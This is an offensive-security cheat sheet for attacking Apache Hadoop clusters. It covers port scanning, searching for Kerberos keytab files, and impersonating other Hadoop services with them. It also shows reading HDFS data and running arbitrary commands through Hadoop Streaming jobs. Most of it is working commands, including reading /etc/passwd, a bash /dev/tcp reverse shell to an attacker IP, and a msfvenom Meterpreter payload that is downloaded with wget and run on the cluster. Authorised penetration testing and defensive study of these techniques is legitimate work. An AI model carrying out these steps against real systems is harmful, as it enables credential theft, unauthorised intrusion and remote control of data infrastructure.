# Apache Hadoop Pentesting

## Apache Hadoop Pentesting <a href="#apache-hadoop-pentesting" id="apache-hadoop-pentesting"></a>

Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. By default it uses ports 8020 and 9000 (NameNode IPC), 50010 and 50020 (DataNode), 50070 (NameNode web UI), 50075 (DataNode web UI), and 50475 (secure DataNode web UI).
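As a quick discovery sketch, these default ports can be swept with nmap (the target IP 10.0.0.2 is a placeholder; adjust to your scope):

```shellscript
# Default Hadoop service ports; 10.0.0.2 is a hypothetical target
HADOOP_PORTS=8020,9000,50010,50020,50070,50075,50475
nmap -sV -p "$HADOOP_PORTS" 10.0.0.2
```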

### Authenticate using Keytab <a href="#authenticate-using-keytab" id="authenticate-using-keytab"></a>

Keytab files are used to authenticate to the KDC (Key Distribution Center) in Kerberos authentication. To find them, execute the following command on the target system.

```shellscript
find / -type f -name "*.keytab" 2>/dev/null
```

After finding them, we can use them to gather information or authenticate.

```shellscript
# Gather information from a keytab
# -k: Specify a keytab file
klist -k /path/to/example.keytab

# Authenticate to Kerberos server and request a ticket.
# <principal_name>: it's stored in example.keytab. Run `klist -k example.keytab` to check it.
# -k: Use a keytab
# -V: verbose mode
# -t <keytab_file>: Filename of keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab
# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
```

#### Impersonate Another Hadoop Service <a href="#impersonate-another-hadoop-service" id="impersonate-another-hadoop-service"></a>

If we find keytabs belonging to other Hadoop services, we can authenticate as those services with **`klist`** and **`kinit`** as above, then investigate the HDFS service with the following HDFS commands.
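For example, assuming a service keytab was found at the hypothetical path `/etc/security/keytabs/yarn.service.keytab`:

```shellscript
# Hypothetical keytab and principal; check the real principal with `klist -k`
KEYTAB=/etc/security/keytabs/yarn.service.keytab
PRINCIPAL=yarn/hadoop.docker.com@EXAMPLE.COM
# Drop any current ticket, then authenticate as the service principal
kdestroy
kinit "$PRINCIPAL" -k -V -t "$KEYTAB"
# Confirm the active ticket
klist
```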

### HDFS Commands <a href="#hdfs-commands" id="hdfs-commands"></a>

#### Find HDFS Binary Path <a href="#find-hdfs-binary-path" id="find-hdfs-binary-path"></a>

When authenticated, we need to find the path of the **`hdfs`** command that ships with Hadoop. This command allows us to execute file system commands against the data lake.\
If the binary's directory is already in the PATH (confirm by running **`echo $PATH`**), we don't have to search for it. Otherwise, find it by running the following command.

```shellscript
find / -type f -name hdfs 2>/dev/null
```

If we find the path, change into its directory (or add it to the PATH) and use the commands below.
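For instance, if the binary turns up under a hypothetical `/opt/hadoop/bin`, extending the PATH avoids having to change directories:

```shellscript
# /opt/hadoop/bin is an assumed location; use the directory that `find` reported
export PATH="$PATH:/opt/hadoop/bin"
```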

#### HDFS Command Cheat Sheet <a href="#hdfs-command-cheat-sheet" id="hdfs-command-cheat-sheet"></a>

Please refer to <https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html#Overview>

As mentioned above, if **`hdfs`** is not in the PATH, we need to go to the directory where the binary exists.\
Most of its file system commands mirror their UNIX counterparts.

```shellscript
hdfs dfs -help

# List files in the hdfs service root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls -R /
# Get the contents of the file
hdfs dfs -cat /example.txt
```

### RCE (Remote Code Execution) <a href="#rce-remote-code-execution" id="rce-remote-code-execution"></a>

Reference: [https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools Techniques and Procedures/Executing remote commands](https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

First, we need to create an arbitrary file that contains at least one character, then put it on HDFS to use as the job input.

```shellscript
echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt
```

Now execute the command below to run an arbitrary command on the cluster via Hadoop Streaming.\
Note that the **`-output`** directory must not already exist, so to execute commands multiple times we have to delete the previous output directory or specify another name.

```shellscript
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE
```

We can see the result of the command in the output directory. For example,

```shellscript
hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000
```

#### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

On the target machine, create a reverse shell script, make it executable, and put it on HDFS. Replace 10.0.0.1:4444 with your listener's address.

```shellscript
echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' > /tmp/shell.sh
chmod +x /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh
```

On the local (attacker) machine, start a listener.

```shellscript
nc -lvnp 4444
```

Now execute the following command.

```shellscript
# -mapper: The command the job executes (our shell script)
# -file: The local path of shell.sh; the file is shipped with the job
# -background: Submit the job without waiting for it to complete
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh" -background
```

We should receive a shell on the local machine.

#### Reverse Shell (MsfVenom) <a href="#reverse-shell-msfvenom" id="reverse-shell-msfvenom"></a>

First, create a reverse shell payload using msfvenom on the local machine and prepare a listener using msfconsole.

```shellscript
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf

msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
```

Host the payload on the local machine (e.g. with `python3 -m http.server 8000`) and download it on the target machine.

```shellscript
wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf
chmod +x /tmp/shell.elf
# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf
```

Now execute the following command.

```shellscript
# -mapper: The command the job executes (our ELF payload)
# -file: The local path of shell.elf; the file is shipped with the job
# -background: Submit the job without waiting for it to complete
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf" -background
```

We should get a Meterpreter session. To spawn an OS shell, run the **`shell`** command inside Meterpreter.
